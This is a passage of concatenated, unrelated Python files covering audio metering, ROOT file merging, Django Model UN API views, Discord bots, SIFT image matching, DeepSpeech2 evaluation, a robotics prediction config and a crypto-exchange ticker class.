    # that interprets the raw bytes as int16 samples.
    data_num = np.frombuffer(data, dtype=np.int16)
    data_num_l = data_num[0::2]   # left channel (interleaved stereo)
    data_num_r = data_num[1::2]   # right channel
    data = wf.readframes(_chunk)
    if len(data_num_l) == 0 or len(data_num_r) == 0:
        break
    # Peak-to-peak amplitude of each channel, normalised to [0, 1].
    cant_l = np.abs(int(np.max(data_num_l)) - int(np.min(data_num_l))) / int(max_v)
    cant_r = np.abs(int(np.max(data_num_r)) - int(np.min(data_num_r))) / int(max_v)
    bar_l = "|" * int(cant_l * lon_bar) + " " * int(lon_bar - cant_l * lon_bar)
    bar_r = "|" * int(cant_r * lon_bar) + " " * int(lon_bar - cant_r * lon_bar)
    print("L=[%s] R=[%s]" % (bar_l, bar_r))

stream.stop_stream()
stream.close()
audio.terminate()
|
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import accuracy_score
from src.utils import load_data
# Train a Gaussian naive-Bayes baseline on the project dataset and report
# its held-out accuracy.
X_train, X_test, y_train, y_test = load_data()

classifier = GaussianNB()
classifier.fit(X_train, y_train)
predictions = classifier.predict(X_test)
accuracy = accuracy_score(y_test, predictions)
print("Scikit-learn GaussianNB accuracy: {0:.3f}".format(accuracy))
|
#!/usr/bin/env python
import os
import sys
import commands
import subprocess
from time import time
###-------------------------------------------------------------------###
def oldRemove(label="", ana="anaPlots"):
    """Delete a stale merged ROOT file ../haddOut/out<label>_<ana>.root,
    after asking the user for confirmation.

    label -- sample label embedded in the file name
    ana   -- analysis tag embedded in the file name
    """
    cmd = []
    # Python 2 `commands` module: returns (status, output); output is [1].
    c = commands.getstatusoutput("ls ../haddOut/out%s_%s.root" % (label, ana))
    if "No such file" not in c[1]:
        # File exists: build the `rm -v <file>` command and confirm.
        cmd.append("rm")
        cmd.append("-v")
        cmd.append("../haddOut/out%s_%s.root" % (label, ana))
        if query_yes_no("Remove out%s_%s.root" % (label, ana)):
            subprocess.call(cmd)
        cmd = []
###-------------------------------------------------------------------###
def doHadd(fList=None, label="", ana="anaPlots"):
    """Merge the ROOT files in fList into ../haddOut/out<label>_<ana>.root
    using ROOT's `hadd` utility at verbosity level 1."""
    print "\n >>> Doing hadd for %s"%(label)
    cmd = []
    cmd.append("hadd")
    cmd.append("-v")
    cmd.append("1")
#    cmd.append("-f")
    cmd.append("../haddOut/out%s_%s.root"%(label, ana))
    # Append every input file as a separate argument.
    for i in fList:
        cmd.append(i)
    subprocess.call(cmd)
###-------------------------------------------------------------------###
def query_yes_no(question, default="yes"):
    """Ask a yes/no question via raw_input() and return their answer.

    "question" is a string that is presented to the user.
    "default" is the presumed answer if the user just hits <Enter>.
        It must be "yes" (the default), "no" or None (meaning
        an answer is required of the user).

    Returns True for "yes" answers and False for "no" answers.
    """
    answers = {"yes": True, "y": True, "ye": True,
               "no": False, "n": False}
    if default is None:
        prompt = " [y/n] "
    elif default == "yes":
        prompt = " [Y/n] "
    elif default == "no":
        prompt = " [y/N] "
    else:
        raise ValueError("invalid default answer: '%s'" % default)
    while True:
        sys.stdout.write(question + prompt)
        reply = raw_input().lower()
        if default is not None and reply == '':
            return answers[default]
        if reply in answers:
            return answers[reply]
        sys.stdout.write("Please respond with 'yes' or 'no' "
                         "(or 'y' or 'n').\n")
###-------------------------------------------------------------------###
def main():
    """Group ROOT files found under the directory given as argv[1] into
    physics samples and hadd each group into one merged output file."""
    baseTime = time()   # NOTE(review): captured but never used afterwards
    parDir = sys.argv[1]
    lsOut = []          # NOTE(review): unused
    # Sample label -> file-name substrings identifying that sample.
    samps = {
        "WJets": ["WJet", "wj_lv_"],
        "QCD": ["_QCD_"],
        "ZJets": ["ZJets"],
        "SinTop": ["_T_", "_Tbar_"],
        "DiBoson": ["_ZZ_", "_WW_", "_WZ_"],
        "TTbar": ["_TT_CT10_"],
        "DY": ["DYJets"],
        "Photon": ["GJets"],
    }
    haddDict = {}
    for key, val in samps.iteritems():   # Python 2 dict iteration
        # Offer to delete any stale merged output for this sample first.
        oldRemove(key)
        # NOTE(review): only val[0] is used in the glob; the remaining
        # substrings (e.g. "_Tbar_", "_WW_") are never matched — confirm
        # whether those samples are meant to be merged too.
        tmp = commands.getstatusoutput("ls %s/*/*%s*.root" % (parDir, val[0]))
        if tmp[0]==0:
            haddDict[key] = tmp[1].split("\n")
    for s in haddDict:
        doHadd(haddDict[s], s, ana="isoTrackPlots")
###-------------------------------------------------------------------###
###-------------------------------------------------------------------###
if __name__=='__main__':
if len(sys.argv)>1:
main()
else:
print "\n >>> Error: Pass a directory as an arguement."
print "\te.g. './hadd MC.py <dirPath>'\n"
|
# Copyright (c) 2011-2015 Berkeley Model United Nations. All rights reserved.
# Use of this source code is governed by a BSD License (see LICENSE).
import datetime
from easy_pdf.views import PDFTemplateView
from easy_pdf.rendering import render_to_pdf_response
from django.conf import settings
from django.http import Http404
from django.template import Context
from rest_framework import generics, status
from rest_framework.authentication import SessionAuthentication
from rest_framework.response import Response
from huxley.api.mixins import ListUpdateModelMixin
from huxley.api.permissions import IsAdvisorOrSuperuser, IsSchoolAdvisorOrSuperuser
from huxley.api.serializers import AssignmentSerializer, DelegateSerializer, SchoolSerializer
from huxley.core.models import Assignment, Conference, Delegate, School
class SchoolList(generics.CreateAPIView):
    """API endpoint for registering (creating) a school."""
    authentication_classes = (SessionAuthentication,)
    queryset = School.objects.all()
    serializer_class = SchoolSerializer
class SchoolDetail(generics.RetrieveUpdateDestroyAPIView):
    """Retrieve, update, or delete a single school.

    Access is restricted to the school's advisor or a superuser.
    """
    authentication_classes = (SessionAuthentication,)
    queryset = School.objects.all()
    serializer_class = SchoolSerializer
    permission_classes = (IsAdvisorOrSuperuser,)

    def put(self, request, *args, **kwargs):
        # PUT is deliberately treated as a partial update so clients may
        # send only the fields they wish to change.
        return self.partial_update(request, *args, **kwargs)
class SchoolAssignments(generics.ListAPIView):
    """List every country assignment belonging to one school."""

    authentication_classes = (SessionAuthentication,)
    serializer_class = AssignmentSerializer
    permission_classes = (IsSchoolAdvisorOrSuperuser,)

    def get_queryset(self):
        """Return the assignments of the school named by the pk URL kwarg."""
        school_id = self.kwargs.get('pk')
        if not school_id:
            raise Http404
        return Assignment.objects.filter(school_id=school_id)
class SchoolDelegates(generics.ListAPIView, ListUpdateModelMixin):
    """List and bulk-update the delegates belonging to one school."""

    authentication_classes = (SessionAuthentication,)
    serializer_class = DelegateSerializer
    permission_classes = (IsSchoolAdvisorOrSuperuser,)

    def get_queryset(self):
        """Return the delegates of the school named by the pk URL kwarg."""
        school_id = self.kwargs.get('pk')
        if not school_id:
            raise Http404
        return Delegate.objects.filter(school_id=school_id)

    def put(self, request, *args, **kwargs):
        """Full bulk update of the school's delegate list."""
        return self.list_update(request, *args, **kwargs)

    def patch(self, request, *args, **kwargs):
        """Partial bulk update of the school's delegate list."""
        return self.list_update(request, partial=True, *args, **kwargs)
class SchoolInvoice(PDFTemplateView):
    """Render a school's registration invoice as a PDF response."""

    def get(self, request, *args, **kwargs):
        template_name = "invoice.html"
        conference = Conference.get_current()
        school = School.objects.get(pk=kwargs['pk'])
        # Invoices fall due three weeks after the registration date.
        due_date = school.registered + datetime.timedelta(days=21)
        total_delegates = (school.beginner_delegates +
                           school.intermediate_delegates +
                           school.advanced_delegates)
        per_delegate_fee = conference.delegate_fee
        context = Context({
            "name": school.name,
            "date_registered": school.registered.strftime("%m/%d/%y"),
            "due_date": due_date.strftime("%m/%d/%y"),
            "delegate_total": total_delegates,
            "delegate_fee": per_delegate_fee,
            "delegate_fees": total_delegates * per_delegate_fee,
            "registration_fee": conference.registration_fee,
            "fees_owed": school.fees_owed,
            "fees_paid": school.fees_paid,
            "amount_due": school.fees_owed - school.fees_paid})
        return render_to_pdf_response(request, template_name, context, **kwargs)
|
import discord
import datetime
# Read the bot token interactively (prompt is Russian for "Enter the bot
# token: ") and create the Discord client.
TOKEN = input('Введите токен бота: ')
client = discord.Client()
@client.event
async def on_message(message):
    """Handle incoming messages; implements a simple "set_timer" command.

    Expected message shape: "set_timer <h> hours <m> minutes ..." — the
    hour count is taken from token index 2 and the minute count from
    token index 4 (unchanged from the original parsing).
    """
    import asyncio  # local import keeps this fix self-contained

    if message.author == client.user:
        return  # ignore the bot's own messages
    if "set_timer" in message.content.lower():
        tokens = message.content.lower().split()
        hours = int(tokens[2])
        minutes = int(tokens[4])
        await message.channel.send(f"The timer should start in {hours} hours and {minutes} minutes. ")
        delta = datetime.timedelta(hours=hours, minutes=minutes)
        # Bug fix: the original busy-waited in a tight `while True` loop
        # with no `await`, which blocks the asyncio event loop and freezes
        # the whole bot until the timer expires.  asyncio.sleep yields
        # control while waiting for the same duration.
        await asyncio.sleep(delta.total_seconds())
        await message.channel.send(f'🕒 Time X has come')
# Start the bot (blocking call).
client.run(TOKEN)
'''
Author: QAlexBall
Description: using sift for captcha
'''
import os
import cv2
import numpy as np
# Start with empty output files (mode "w" already truncates; the explicit
# truncate() calls are harmless belt-and-braces).
with open('loggings.txt', 'w') as f:
    f.truncate()
with open('mappings_test.txt', 'w') as f:
    f.truncate()

# For every captcha directory under ./train/ and each of its four unknown
# digit images (<x>1.jpg .. <x>4.jpg), find the reference digit image
# (0.jpg .. 8.jpg) with the most good SIFT matches, and record the result.
for x in os.listdir('./train/'):
    # NOTE(review): `break` aborts the whole run if this entry ever shows
    # up in the listing; `continue` was probably intended — confirm before
    # changing, since it alters which directories get processed.
    if x == 'mappings_test.txt':
        break
    print(str(x))
    # Bug fix: the original re-opened "loggings.txt" on every inner
    # iteration and opened "mappings_test.txt" once per directory, closing
    # only the final handles — a file-descriptor leak.  Context managers
    # open each file once per directory and always close it.
    with open("mappings_test.txt", "a") as maps, open("loggings.txt", "a") as log:
        maps.write(str(x) + ',')
        for j in range(1, 5):
            imgname2 = './train/' + str(x) + '/' + str(x) + str(j) + '.jpg'
            num_sift = [0, 0, 0, 0, 0, 0, 0, 0, 0]
            for i in range(0, 9):
                imgname1 = './train/' + str(x) + '/' + str(i) + '.jpg'
                ## (1) load both images and convert to grayscale
                img1 = cv2.imread(imgname1)
                img2 = cv2.imread(imgname2)
                gray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
                gray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
                ## (2) SIFT detector and FLANN matcher
                sift = cv2.xfeatures2d.SIFT_create()
                matcher = cv2.FlannBasedMatcher(dict(algorithm=1, trees=5), {})
                ## (3) keypoints and descriptors for both images
                kpts1, descs1 = sift.detectAndCompute(gray1, None)
                kpts2, descs2 = sift.detectAndCompute(gray2, None)
                ## (4) kNN match (top 2), sorted by distance
                matches = matcher.knnMatch(descs1, descs2, 2)
                matches = sorted(matches, key=lambda m: m[0].distance)
                ## (5) Lowe's ratio test keeps only confident matches
                good = [m1 for (m1, m2) in matches if m1.distance < 0.75 * m2.distance]
                num_sift[i] = len(good)
            # reference digit with the highest good-match count
            max_sift = num_sift.index(max(num_sift))
            print(max_sift)
            maps.write(str(max_sift))
            log.write(str(x) + str(j) + str(num_sift) +
                      'max:' + str(max_sift) + '\n')
            log.write('\n')
        maps.write('\n')
        print()
|
from discord.ext import commands
import discord
import logging
import config
from cogs import secret
def setup_logger():
    """Configure root logging to append INFO-level records to bot.log."""
    logging.basicConfig(level=logging.INFO, filename='bot.log')
class Bot(commands.Bot):
    """Discord bot that loads the cog extensions listed in config.cogs."""

    def __init__(self, **kwargs):
        # Respond either to '!' or to the bot being @-mentioned.
        super().__init__(command_prefix=commands.when_mentioned_or('!'), **kwargs)
        # Load each configured extension; a failure is logged but does not
        # stop the remaining cogs from loading.
        for cog in config.cogs:
            try:
                self.load_extension(cog)
            except Exception as exc:
                logging.error('Could not load extension {0} due to {1.__class__.__name__}: {1}'.format(cog, exc))

    async def on_ready(self):
        # Log and echo the bot's identity once the gateway session is ready.
        logging.info('Logged on as {0} (ID: {0.id})'.format(self.user))
        print('Logged on as {0} (ID: {0.id})'.format(self.user))
# Script entry point: configure logging, then run the bot with the token
# stored in cogs/secret.py.
if __name__ == "__main__":
    setup_logger()
    bot = Bot()
    bot.run(secret.token)
|
# Population simulation: each year the population grows by pc percent and
# loses qr individuals; it either goes extinct (<= 0) or hits the 12000
# limit.  The year count is printed either way.
qi = int(input())            # initial population
pc = float(input()) / 100    # yearly growth rate (read as a percentage)
qr = int(input())            # individuals removed each year
i = 0                        # elapsed years
while 0 < qi < 12000:
    qi += qi * pc - qr
    i += 1
# Bug fix: the loop also exits when qi is exactly 0, which is extinction;
# the original `qi < 0` test misreported that case as LIMITE.
if qi <= 0:
    print("EXTINCAO")
    print(i)
else:
    print("LIMITE")
    print(i)
"""Evaluation for DeepSpeech2 model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import argparse
import distutils.util
import gzip
import multiprocessing

import paddle.v2 as paddle

from data_utils.data import DataGenerator
from decoder import *
from error_rate import wer
from lm.lm_scorer import LmScorer
from model import deep_speech2
# Command-line configuration for evaluation.  Defaults mirror the training
# setup.  NOTE(review): the cpu_count() defaults below require the
# `multiprocessing` module to be imported at the top of this file.
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
    "--batch_size",
    default=100,
    type=int,
    help="Minibatch size for evaluation. (default: %(default)s)")
parser.add_argument(
    "--num_conv_layers",
    default=2,
    type=int,
    help="Convolution layer number. (default: %(default)s)")
parser.add_argument(
    "--num_rnn_layers",
    default=3,
    type=int,
    help="RNN layer number. (default: %(default)s)")
parser.add_argument(
    "--rnn_layer_size",
    default=512,
    type=int,
    help="RNN layer cell number. (default: %(default)s)")
parser.add_argument(
    "--use_gpu",
    default=True,
    type=distutils.util.strtobool,
    help="Use gpu or not. (default: %(default)s)")
parser.add_argument(
    "--num_threads_data",
    default=multiprocessing.cpu_count(),
    type=int,
    help="Number of cpu threads for preprocessing data. (default: %(default)s)")
parser.add_argument(
    "--num_processes_beam_search",
    default=multiprocessing.cpu_count(),
    type=int,
    help="Number of cpu processes for beam search. (default: %(default)s)")
parser.add_argument(
    "--mean_std_filepath",
    default='mean_std.npz',
    type=str,
    help="Manifest path for normalizer. (default: %(default)s)")
parser.add_argument(
    "--decode_method",
    default='beam_search',
    type=str,
    help="Method for ctc decoding, best_path or beam_search. (default: %(default)s)"
)
parser.add_argument(
    "--language_model_path",
    default="lm/data/common_crawl_00.prune01111.trie.klm",
    type=str,
    help="Path for language model. (default: %(default)s)")
parser.add_argument(
    "--alpha",
    default=0.26,
    type=float,
    help="Parameter associated with language model. (default: %(default)f)")
parser.add_argument(
    "--beta",
    default=0.1,
    type=float,
    help="Parameter associated with word count. (default: %(default)f)")
parser.add_argument(
    "--cutoff_prob",
    default=0.99,
    type=float,
    help="The cutoff probability of pruning"
    "in beam search. (default: %(default)f)")
parser.add_argument(
    "--beam_size",
    default=500,
    type=int,
    help="Width for beam search decoding. (default: %(default)d)")
parser.add_argument(
    "--specgram_type",
    default='linear',
    type=str,
    help="Feature type of audio data: 'linear' (power spectrum)"
    " or 'mfcc'. (default: %(default)s)")
parser.add_argument(
    "--decode_manifest_path",
    default='datasets/manifest.test',
    type=str,
    help="Manifest path for decoding. (default: %(default)s)")
parser.add_argument(
    "--model_filepath",
    default='checkpoints/params.latest.tar.gz',
    type=str,
    help="Model filepath. (default: %(default)s)")
parser.add_argument(
    "--vocab_filepath",
    default='datasets/vocab/eng_vocab.txt',
    type=str,
    help="Vocabulary filepath. (default: %(default)s)")
args = parser.parse_args()
def evaluate():
    """Evaluate on whole test data for DeepSpeech2.

    Builds the inference network, loads trained parameters, decodes every
    utterance in the test manifest (best-path or beam-search CTC decoding),
    and prints the aggregate word error rate (WER).
    """
    # initialize data generator
    data_generator = DataGenerator(
        vocab_filepath=args.vocab_filepath,
        mean_std_filepath=args.mean_std_filepath,
        augmentation_config='{}',
        specgram_type=args.specgram_type,
        num_threads=args.num_threads_data)
    # create network config
    # paddle.data_type.dense_array is used for variable batch input.
    # The size 161 * 161 is only a placeholder value and the real shape
    # of input batch data will be induced during training.
    audio_data = paddle.layer.data(
        name="audio_spectrogram", type=paddle.data_type.dense_array(161 * 161))
    text_data = paddle.layer.data(
        name="transcript_text",
        type=paddle.data_type.integer_value_sequence(data_generator.vocab_size))
    output_probs = deep_speech2(
        audio_data=audio_data,
        text_data=text_data,
        dict_size=data_generator.vocab_size,
        num_conv_layers=args.num_conv_layers,
        num_rnn_layers=args.num_rnn_layers,
        rnn_size=args.rnn_layer_size,
        is_inference=True)
    # load parameters
    parameters = paddle.parameters.Parameters.from_tar(
        gzip.open(args.model_filepath))
    # prepare infer data
    batch_reader = data_generator.batch_reader_creator(
        manifest_path=args.decode_manifest_path,
        batch_size=args.batch_size,
        min_batch_size=1,
        sortagrad=False,
        shuffle_method=None)
    # define inferer
    inferer = paddle.inference.Inference(
        output_layer=output_probs, parameters=parameters)
    # initialize external scorer for beam search decoding
    if args.decode_method == 'beam_search':
        ext_scorer = LmScorer(args.alpha, args.beta, args.language_model_path)
    wer_counter, wer_sum = 0, 0.0
    for infer_data in batch_reader():
        # run inference
        infer_results = inferer.infer(input=infer_data)
        num_steps = len(infer_results) // len(infer_data)
        # Split the flat result matrix into one probability sequence per
        # utterance of the batch.
        probs_split = [
            infer_results[i * num_steps:(i + 1) * num_steps]
            for i in xrange(0, len(infer_data))
        ]
        # target transcription
        target_transcription = [
            ''.join([
                data_generator.vocab_list[index] for index in infer_data[i][1]
            ]) for i, probs in enumerate(probs_split)
        ]
        # decode and print
        # best path decode
        if args.decode_method == "best_path":
            for i, probs in enumerate(probs_split):
                output_transcription = ctc_best_path_decoder(
                    probs_seq=probs, vocabulary=data_generator.vocab_list)
                wer_sum += wer(target_transcription[i], output_transcription)
                wer_counter += 1
        # beam search decode
        elif args.decode_method == "beam_search":
            # beam search using multiple processes
            beam_search_results = ctc_beam_search_decoder_batch(
                probs_split=probs_split,
                vocabulary=data_generator.vocab_list,
                beam_size=args.beam_size,
                blank_id=len(data_generator.vocab_list),
                num_processes=args.num_processes_beam_search,
                ext_scoring_func=ext_scorer,
                cutoff_prob=args.cutoff_prob, )
            for i, beam_search_result in enumerate(beam_search_results):
                wer_sum += wer(target_transcription[i],
                               beam_search_result[0][1])
                wer_counter += 1
        else:
            # BUG FIX: `decode_method` was an undefined local name here, so an
            # unsupported method raised NameError instead of this ValueError.
            raise ValueError("Decoding method [%s] is not supported." %
                             args.decode_method)
    print("Final WER = %f" % (wer_sum / wer_counter))
def main():
    """Entry point: initialize PaddlePaddle, then run the full evaluation."""
    # Single trainer process; GPU usage is controlled by the --use_gpu flag.
    paddle.init(use_gpu=args.use_gpu, trainer_count=1)
    evaluate()
if __name__ == '__main__':
    main()
|
import os
import sys
# Make the repository root importable and visible on PATH so sibling
# packages and tools resolve when this file is run directly.
project_dir = os.path.join(os.path.dirname(__file__), "..")
sys.path.insert(0, project_dir)
os.environ['PATH'] += os.pathsep + project_dir
from pathlib import Path
class ActionType:
    """String constants naming the HRI interaction scenarios used by this config."""
    CO_EXISTING = "co-existing"
    CO_OPERATION = "co-operating"
    COMBINED = "combined"
    NOISE = "noise"
def reset_tf():
    """Clear the default TensorFlow 1.x graph so a fresh model can be built."""
    # Imported lazily so modules that never touch TF don't pay the import cost.
    import tensorflow as tf
    tf.reset_default_graph()
# tf.flags.FLAGS.remove_flag_values(tf.flags.FLAGS.flag_values_dict())
# tf.flags.FLAGS.__delattr__()
#
# def del_all_flags(FLAGS):
# flags_dict = FLAGS._flags()
# keys_list = [keys for keys in flags_dict]
# for keys in keys_list:
# FLAGS.__delattr__(keys)
#
# del_all_flags(tf.flags.FLAGS)
# Optional path to a local Blender/OpenSCAD installation; set to None to skip
# the sys.path / PATH injection below (needed for mesh tooling on Windows).
BLENDER_OR_OPENSCAD_PATH = r"D:\Program Files\Blender 2.92" # None
if BLENDER_OR_OPENSCAD_PATH is not None:
    import sys, os
    sys.path.insert(0, BLENDER_OR_OPENSCAD_PATH)
    os.environ['PATH'] += os.pathsep + BLENDER_OR_OPENSCAD_PATH
config_root_dir = os.path.dirname(os.path.abspath(__file__)) # added
# for any parameter related mogaze data 'MOGAZE' is mentioned in the variable name
# set whether to consider goal input for prednet_run
AVOID_GOAL = False
# Hyperparameter
LEARNING_RATE = 0.001
LEARNING_RATE_DECAY_FACTOR = 0.95
LEARNING_RATE_STEP = 10000
MAX_GRADIENT_NORM = 8
BATCH_SIZE = 30
ITERATIONS = 3600
# Architecture - rnn_GRU
ARCHITECTURE = "prednet" # share encoder decoder parameters
SIZE = 1024
NUM_LAYERS = 1
SEQ_LENGTH_IN = 50
SEQ_LENGTH_OUT = 25
RESIDUAL_VELOCITIES = True
LOSS_TO_USE = 'sampling_based'
# Directories
ROOT_DIR = os.path.normpath(Path(__file__).parent.parent)
DATA_DIR = os.path.normpath(os.path.join(ROOT_DIR, 'data/hri_data/'))
MOGAZE_DATA_DIR = os.path.normpath(os.path.join(ROOT_DIR, 'data/mogaze_data/'))
EXP_DIR = os.path.normpath(os.path.join(ROOT_DIR, 'experiments/results/'))
ACTION = 'combined' # or 'noise', 'co-existing', 'co-operating'
# train parameters
TRAIN_MOGAZE = False
VAL_EVERY = 100
SAVE_EVERY = 100
USE_CPU = False
TRAIN_LOAD = 0
SUB_BATCH_SIZE = 13
MOGAZE_SUB_BATCH_SIZE = 68
MOGAZE_VAL_SUB_BATCH_SIZE = 22
# test parameters
TEST_MOGAZE = False
TEST_LOAD = 1500 # for RED 1500, for PredNet 1800,
TEST_DATA = 'pred_test_noise'
TEST_SUB_BATCH_SIZE = 325
MOGAZE_TEST_SUB_BATCH_SIZE = 2
# data
OUTPUT_QPOS_SIZE = 35
QPOS_SIZE = 34 if AVOID_GOAL else 37
HUMAN_SIZE = 34 # after converting root_orientation quat -> euler
MOGAZE_SIZE = 66
GOAL_SIZE = 3
# ------------------------------------
# variables for chull viz. and vol. occ. error computation
# ------------------------------------
EPISODES = 30
PREDICTION_STEPS = 325 # removed,
TOTAL_STEPS = 350 # 325+25
# CHULL_SCENARIO = 'co-existing'
VIZ_QPOS_CHULL = False
VIZ_VOE_CHULL = True
# ------------------------------------
# Derived paths and model-factory callables. All of these placeholders are
# filled in by update_experiments_dir() below, based on ARCHITECTURE/ACTION.
TRAIN_DIR = None
SUMMARIES_DIR = None
CKPT_DIR = None
CHULL_BASE_DIR = None
DIR_PRED_CHULL_QPOS = None
DIR_DRL_CHULL_QPOS = None
DIR_PRED = None
DIR_DRL = None
DIR_INTERSECTION = None
MOGAZE_NORM_STAT_DIR = None
NORM_STAT_DIR = None
HRI_TEST_DATA_DIR = None
CREATE_MODEL_HRI_FN = None
CREATE_MODEL_MOGAZE_FN = None
LOAD_MODEL_FN = None # function for loading PredNet or RED model
RED_FLAGS_FN = None
HRI_DATA_PATH = os.path.join(DATA_DIR, "hri_scenarios.h5")
def update_experiments_dir():
    """Recompute every derived directory, model factory, and checkpoint step.

    Must be called after changing ARCHITECTURE, ACTION, or AVOID_GOAL:
    it rewrites the module-level placeholders (TRAIN_DIR, CKPT_DIR, the
    *_FN factories, TEST_LOAD, ...) to match the current configuration.
    Raises for unknown ACTION values under the "prednet" architecture.
    """
    global TRAIN_DIR, SUMMARIES_DIR, CKPT_DIR, CHULL_BASE_DIR, DIR_PRED_CHULL_QPOS, DIR_DRL_CHULL_QPOS, DIR_PRED, \
        DIR_DRL, DIR_INTERSECTION, QPOS_SIZE, MOGAZE_NORM_STAT_DIR, NORM_STAT_DIR, HRI_TEST_DATA_DIR, \
        CREATE_MODEL_HRI_FN, CREATE_MODEL_MOGAZE_FN, LOAD_MODEL_FN, RED_FLAGS_FN, TEST_LOAD
    avoid_goal_str = "_avoid_goal" if AVOID_GOAL else ""
    TRAIN_DIR = os.path.normpath(os.path.join(EXP_DIR,
                                              "models",
                                              ARCHITECTURE,
                                              '{}{}'.format(ACTION, avoid_goal_str),
                                              # 'out_{0}'.format(SEQ_LENGTH_OUT),
                                              # 'iterations_{0}'.format(ITERATIONS),
                                              # "tied",
                                              # LOSS_TO_USE,
                                              # 'depth_{0}'.format(NUM_LAYERS),
                                              # 'size_{0}'.format(SIZE),
                                              # 'lr_{0}'.format(LEARNING_RATE),
                                              # 'residual_vel' if RESIDUAL_VELOCITIES else 'not_residual_vel'
                                              ))
    SUMMARIES_DIR = os.path.normpath(os.path.join(TRAIN_DIR, "log"))  # Directory for TB summaries
    CKPT_DIR = TRAIN_DIR  # os.path.normpath(TRAIN_DIR, 'model_ckpt')
    if (ACTION == "combined" or ACTION == "p1_1") and AVOID_GOAL:
        CHULL_BASE_DIR = os.path.join(EXP_DIR, "voe", ARCHITECTURE, ACTION + '_avoid_goal')
    elif AVOID_GOAL:
        CHULL_BASE_DIR = os.path.join(EXP_DIR, "voe", ARCHITECTURE, ACTION, 'avoid_goal')
    else:
        CHULL_BASE_DIR = os.path.join(EXP_DIR, "voe", ARCHITECTURE, ACTION)
    # qpos data dir
    DIR_PRED_CHULL_QPOS = os.path.join(CHULL_BASE_DIR, 'pred_chull_viz', 'qpos')
    DIR_DRL_CHULL_QPOS = os.path.join(CHULL_BASE_DIR, 'drl_chull_viz', 'qpos')
    # mesh_files dir
    DIR_PRED = os.path.join(CHULL_BASE_DIR, 'pred_chull_viz', 'mesh_files')
    DIR_DRL = os.path.join(CHULL_BASE_DIR, 'drl_chull_viz', 'mesh_files')
    DIR_INTERSECTION = os.path.join(CHULL_BASE_DIR, 'intersection_meshes')
    HRI_TEST_DATA_DIR = os.path.join(DATA_DIR, ACTION, 'test_all')
    if ARCHITECTURE == "prednet":
        MOGAZE_NORM_STAT_DIR = os.path.join(MOGAZE_DATA_DIR, 'norm_stat/')
        NORM_STAT_DIR = os.path.join(DATA_DIR, ACTION, 'norm_stat/')
        QPOS_SIZE = 34 if AVOID_GOAL else 37
        # Imports are local so the heavy model modules load only when needed.
        from models.prednet.train_prednet import create_model
        CREATE_MODEL_HRI_FN = create_model
        CREATE_MODEL_MOGAZE_FN = create_model
        from models.prednet.prednet_model import PredNet
        LOAD_MODEL_FN = PredNet.load_model
        # Per-scenario checkpoint iteration to restore at test time.
        if ACTION == "p1_1":
            TEST_LOAD = 6000  # for RED 1500, for PredNet 1800,
        elif ACTION == "combined":
            if AVOID_GOAL:
                TEST_LOAD = 3000  # for RED 1500, for PredNet 1800,
            else:
                TEST_LOAD = 1800  # for RED 1500, for PredNet 1800,
        elif ACTION == "co-operating":
            TEST_LOAD = 3500  # for RED 1500, for PredNet 1800,
        elif ACTION == "co-existing":
            TEST_LOAD = 900  # for RED 1500, for PredNet 1800,
        elif ACTION == "noise":
            TEST_LOAD = 1300  # for RED 1500, for PredNet 1800,
        else:
            raise Exception("Unknown action {}".format(ACTION))
    else:
        MOGAZE_NORM_STAT_DIR = os.path.join(MOGAZE_DATA_DIR, 'norm_stat_red/')
        NORM_STAT_DIR = os.path.join(DATA_DIR, ACTION, 'norm_stat_red/')
        QPOS_SIZE = 37
        if ACTION == "p1_1":
            from models.red.Mogaze.mogaze_translate import create_model as red_mogaze_create_model, create_flags
            CREATE_MODEL_MOGAZE_FN = red_mogaze_create_model
            RED_FLAGS_FN = create_flags
            TEST_LOAD = 6000  # for RED 1500, for PredNet 1800,
        else:
            from models.red.HRI_Scenario.HRI_translate import create_model as red_hri_create_model, create_flags
            CREATE_MODEL_HRI_FN = red_hri_create_model
            RED_FLAGS_FN = create_flags
            TEST_LOAD = 1500  # for RED 1500, for PredNet 1800,
        from models.red.red_utils import load_model
        LOAD_MODEL_FN = load_model
# Populate all derived globals once at import time with the defaults above.
update_experiments_dir()
|
import coins
class exchange:
    """Base class for a crypto exchange.

    Holds the ticker endpoint, fee rates, and one attribute per supported
    coin; concrete subclasses fill in the coin objects and implement the
    bid/ask parsing hooks.
    """

    def __init__(self, exchange_url: str, exchange_name: str):
        self.exchange_ticker = exchange_url   # ticker endpoint URL
        self.supported_coins = []             # filled by populate_coin_list()
        self.name = exchange_name
        self.maker_fee = 0
        self.taker_fee = 0
        # Coin placeholders, one per supported asset; subclasses replace
        # these None values with coin objects before populate_coin_list().
        self.bitcoin = None
        self.ethereum = None
        self.tezos = None
        self.link = None
        self.stellar = None
        self.cosmos = None
        self.usdt = None

    def populate_coin_list(self):
        """Collect the individual coin attributes into supported_coins."""
        self.supported_coins.extend([
            self.bitcoin,
            self.ethereum,
            self.tezos,
            self.link,
            self.stellar,
            self.cosmos,
            self.usdt,
        ])

    def get_supported_coins(self):
        """Return the coin list built by populate_coin_list()."""
        return self.supported_coins

    def refresh(self):
        """Fetch the ticker endpoint and update all bid/ask prices."""
        payload = json.loads(requests.get(self.exchange_ticker).text)
        self.get_bid_prices(payload)
        self.get_ask_prices(payload)

    def get_name(self) -> str:
        return self.name

    def get_bid_prices(self, response_json: dict):
        """Parse bid prices from the ticker payload; overridden per exchange."""
        pass

    def get_ask_prices(self, response_json: dict):
        """Parse ask prices from the ticker payload; overridden per exchange."""
        pass

    def get_maker_fee(self):
        return self.maker_fee

    def get_taker_fee(self):
        return self.taker_fee
import requests,json
class PARIBU(exchange):
    """Paribu (TRY-quoted) exchange: fees, withdrawal costs, and ticker parsing."""

    def __init__(self, exchange_url: str = 'https://www.paribu.com/ticker'):
        super().__init__(exchange_url, "PARIBU")
        self.maker_fee = (0.25 / 100)
        self.taker_fee = (0.35 / 100)
        # Coin objects; the constructor argument is the withdrawal fee.
        self.bitcoin = coins.Bitcoin(0.0005)
        self.ethereum = coins.Ethereum(0)
        self.tezos = coins.Tezos(0)
        self.link = coins.Link(0)
        self.stellar = coins.Stellar(0)
        self.cosmos = coins.Cosmos(0)
        self.usdt = coins.USDT(0)
        self.populate_coin_list()

    # Redundant pass-through overrides of get_supported_coins,
    # populate_coin_list and refresh removed; the inherited versions
    # are identical.

